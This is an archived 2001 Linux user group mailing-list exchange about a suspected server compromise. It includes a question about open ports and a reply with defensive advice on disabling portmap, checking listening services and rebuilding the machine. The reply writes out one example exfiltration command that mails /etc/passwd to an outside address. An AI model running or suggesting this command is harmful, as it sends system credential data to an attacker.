Tugger the SLUGger!SLUG Mailing List Archives

RE: [SLUG] Security Breach


Hi,

In this context. What is port 587 and 1024. I couldn't find these in
/etc/services


tcp        0      0 0.0.0.0:587             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:1024            0.0.0.0:*               LISTEN

Bernhard Lüder

This electronic mail is solely for the use of the addressee and may contain
information that is confidential or privileged.  If you receive this
electronic mail in error, please delete it from your system immediately and
notify the sender by electronic mail.


-----Original Message-----
From: slug-admin@xxxxxxxxxxx [mailto:slug-admin@xxxxxxxxxxx]On Behalf Of
Umar Goldeli
Sent: Wednesday, February 28, 2001 11:37 AM
To: Sean Carmody
Cc: slug@xxxxxxxxxxx
Subject: Re: [SLUG] Security Breach


> Feb 28 01:53:07 emu portmap[12152]: connect from 202.157.133.184 to
> getport(status): request from unauthorized host

Why are you rnning the portmapper? Turn it off if youdon't specifically
need it.

a "netstat -an | grep LISTEN" will show you "evilthings(tm)" ;)

If you don't recognize it as something you specifically need - turn it
off. :)

Either way, chances are that this is not how they got in - he probably did
an rpcinfo -p <yourip> or similar and your config recognized that he
wasn't allowed.

As above - if you don't need portmap, turn it off.

> Has anyone come across something similar? I've no idea whether this is
> the result of a trojan, or whether someone managed to gain access to
> my machine (although if they did gain root access, why mail out a passwd
> file?). Any thoughts?

Remember - root access is generally the *eventual* goal... just because he
got in as userx, doesn't mean he has root, or even a shell for that
matter. It could be as simple as a buffer oveflow with something like
"/bin/mailx < /etc/passwd bob@xxxxxxxxxxx" etc.. (or somehting like
that)..

It could be anything.. either way - you know that something has
happened. Make an executive decision to decide if it has (I think it
has) and pull the box from production, rebuild it, secure it, patch it,
then change all user passwords (if any).

If you can, pull the box out of prod and put in a new box while you
examine the compromised one.

//umar.



--
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://slug.org.au/lists/listinfo/slug